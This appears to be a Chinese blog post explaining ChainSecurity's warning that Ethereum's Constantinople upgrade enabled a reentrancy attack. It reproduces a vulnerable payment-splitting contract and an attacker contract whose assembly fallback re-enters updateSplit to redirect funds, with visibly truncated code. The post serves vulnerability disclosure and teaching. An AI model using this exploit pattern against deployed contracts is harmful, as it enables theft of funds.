18 January 2019


以太坊预计在 7080000 区块进行君士坦丁堡网络升级,升级内容主要包含了 EIP 145EIP 1014EIP 1052EIP 1283EIP 1234,但就在升级的前一天,ChainSecurity 爆出此次升级可能会导致主网上的合约遭受重入攻击。


ChainSecurity 示例中被攻击合约如下

pragma solidity ^0.5.0;

contract PaymentSharer {
  mapping(uint => uint) splits;
  mapping(uint => uint) deposits;
  mapping(uint => address payable) first;
  mapping(uint => address payable) second;

  function init(uint id, address payable _first, address payable _second) public {
    require(first[id] == address(0) && second[id] == address(0));
    require(first[id] == address(0) && second[id] == address(0));
    first[id] = _first;
    second[id] = _second;

  function deposit(uint id) public payable {
    deposits[id] += msg.value;  // 1.

  function updateSplit(uint id, uint split) public {
    require(split <= 100);
    splits[id] = split;

  function splitFunds(uint id) public {
    // Here would be: 
    // Signatures that both parties agree with this split

    // Split
    address payable a = first[id];
    address payable b = second[id];
    uint depo = deposits[id];
    deposits[id] = 0;

    a.transfer(depo * splits[id] / 100);          // 2.
    b.transfer(depo * (100 - splits[id]) / 100);  // 5.


pragma solidity ^0.5.0;

import "./PaymentSharer.sol";

contract Attacker {
  address private victim;
  address payable owner;

  constructor() public {
    owner = msg.sender;

  function attack(address a) external {
    victim = a;
    PaymentSharer x = PaymentSharer(a);
    x.updateSplit(0, 100);

  function () payable external {  // 3.
    address x = victim;
        mstore(0x80, 0xc3b18fb600000000000000000000000000000000000000000000000000000000)
        pop(call(10000, x, 0, 0x80, 0x44, 0, 0))  // 4.

  function drain() external {
  1. 首先攻击者调用 deposit 发送一定数量的 ETH 给被攻击合约
  2. 接着调用 attack 方法,将所有资金发送给攻击者的地址
  3. 由于攻击者是一个合约地址,因此 fallback 方法被触发
  4. fallback 方法重新触发 updateSplit 并将 splits[id] 值更改为 0
  5. 此时继续执行第二笔转账就会导致合约资金被盗取

流程可以参考 twitter 上的这张图

constantinople reentrancy attack

之所以攻击能够生效,是因为 transfer 方法默认指定 2300 gas limit,而 mstore 操作在此次网络升级之前消耗的 gas 超过 2300,而在此次网络更新之后降低为 200 gas,这就导致了 mstore 能够成功执行。

inline assembly code

call(g, a, v, in, insize, out, outsize)
call contract at address a with input mem[in…(in+insize)) providing g gas and v wei and output area mem[out…(out+outsize)) returning 0 on error (eg. out of gas) and 1 on success

最后我们来分析一下这段汇编代码做了什么,首先通过 web3.utils.sha3("updateSplit(uint256,uint256)") 计算并获取方法签名的前4个字节 0xc3b18fb6,接着我们将该方法签名补齐32字节并存储到 0x80 地址(当前 solidity 实现将自由内存指针 0x80 存放在 0x40 位置),然后通过 call 调用,call 的参数解释如下,指定花费 gas limit 10000,被攻击者合约地址 x,转账 ether 金额 0,方法和参数起始地址 0x80,参数的长度 0x44(即 68 bytes = 4 method sign bytes + 32 bytes uint256 + 32 bytes uint256),输出值的起始地址 0,输出值的长度 0,最后把 call 返回值从栈中移除。

Constantinople enables new Reentrancy Attack
Solidity Assembly